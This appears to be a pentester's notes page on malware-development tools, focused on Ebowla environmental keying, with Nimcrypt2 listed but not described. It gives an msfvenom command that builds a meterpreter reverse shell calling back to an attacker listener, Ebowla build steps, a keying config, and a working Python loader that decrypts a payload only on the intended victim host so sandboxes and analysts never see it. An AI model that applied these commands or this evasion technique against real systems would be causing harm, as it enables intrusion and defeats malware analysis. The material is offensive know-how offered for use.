Pentesting & Red Teaming Notes - Malware Development

Tools


Last updated 2 years ago

Ebowla

Ebowla does environmental keying: the payload is encrypted at build time with a key derived from properties of the intended target, and the generated loader rebuilds that key from the live environment on the box and decrypts the payload at run time. If the values do not match (sandbox, analyst VM, wrong user), the key is wrong, the decryption fails and the payload never appears in clear. Typical key material is environment variables such as the username, computer name or user domain.

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.133 LPORT=9001 -f exe > shell.exe
./ebowla.py shell.exe genetic.config
./build_x64_go.sh output/go_symmetric_shell.exe.go morph3-ebowla.exe

An example genetic.config (only the relevant parts are shown; variables left blank are not used as key material, so the loader below keys on username and userdomain only):

...
     output_type = GO 
...
        [[ENV_VAR]]
        username = 'morph3'
        computername = ''
        homepath = ''
        homedrive = ''
        Number_of_processors = ''
        processor_identifier = ''
        processor_revision = ''
        userdomain = 'acme'
        systemdrive = ''
        userprofile = ''
        path = ''
        temp = ''
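To make the keying step concrete, here is an added Python example that mirrors what the config above asks for. It is not Ebowla's code: the cipher (HMAC-SHA256 in counter mode), the plaintext hash used to detect a wrong environment, the lower-casing of values and the ENV_VAR_CONFIG dictionary are all assumptions of this example, chosen to show the mechanism rather than reproduce Ebowla's format.

```python
"""Environmental keying in the style of Ebowla (added example, not Ebowla's code)."""
import hashlib
import hmac
import os

# Constructed stand-in for the [[ENV_VAR]] block of genetic.config.
# Blank entries are not used as key material (this example drops them;
# the same is assumed of Ebowla's handling of blank fields).
ENV_VAR_CONFIG = {
    "username": "morph3",
    "computername": "",
    "userdomain": "acme",
    "homedrive": "",
}


def selected_names(config):
    """Return the selectors that carry a value, in a fixed order."""
    return sorted(name for name, value in config.items() if value)


def key_from_values(values):
    """Derive the payload key from selector name/value pairs.

    Values are lower-cased so the comparison is case-insensitive, as Windows
    environment variables are (assumption of this example). Names are folded
    in too, so a host whose USERNAME and USERDOMAIN happen to be swapped does
    not produce the same key.
    """
    h = hashlib.sha256()
    for name in sorted(values):
        h.update(name.encode() + b"=" + values[name].lower().encode() + b"\x00")
    return h.digest()


def keystream(key, length):
    """HMAC-SHA256 in counter mode; a stand-in for whatever cipher Ebowla uses."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def xor(data, stream):
    return bytes(a ^ b for a, b in zip(data, stream))


def encode_payload(payload, config):
    """Builder side: encrypt under the key the *expected* environment yields.

    The blob carries a SHA-256 of the plaintext so the loader can tell a wrong
    environment from a correct one; the key itself is never stored.
    """
    names = selected_names(config)
    key = key_from_values({n: config[n] for n in names})
    return hashlib.sha256(payload).digest() + xor(payload, keystream(key, len(payload)))


def decode_payload(blob, names, env):
    """Target side: rebuild the key from the live environment and try to decrypt.

    Returns the payload bytes on a matching host and None anywhere else, so
    the loader can exit quietly instead of executing garbage.
    """
    values = {n: env.get(n.upper(), "") for n in names}
    key = key_from_values(values)
    digest, body = blob[:32], blob[32:]
    candidate = xor(body, keystream(key, len(body)))
    if not hmac.compare_digest(hashlib.sha256(candidate).digest(), digest):
        return None
    return candidate


if __name__ == "__main__":
    payload = b"MZ\x90\x00 constructed stand-in for shell.exe"
    blob = encode_payload(payload, ENV_VAR_CONFIG)
    names = selected_names(ENV_VAR_CONFIG)
    # Constructed environments for the intended box and for a sandbox.
    right_box = {"USERNAME": "morph3", "USERDOMAIN": "ACME"}
    wrong_box = {"USERNAME": "analyst", "USERDOMAIN": "sandbox"}
    print(decode_payload(blob, names, right_box) == payload)   # True
    print(decode_payload(blob, names, wrong_box))              # None
    # What the real loader would do: key on the host it is running on.
    print(decode_payload(blob, names, dict(os.environ)) is not None)
```

The stored hash is what lets the loader fail cleanly, but it also lets an analyst who has the blob try candidate environments offline. Keying on a single low-entropy attribute such as the username is therefore weak on its own; combining several selectors (username, userdomain, computername) raises the cost of that guess considerably.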

Nimcrypt2

https://github.com/Genetic-Malware/Ebowla
https://github.com/icyguider/Nimcrypt2
https://twitter.com/binitamshah/status/1594698510762332160?s=46&t=LDLfp0MIS1Dsg420TRpKXA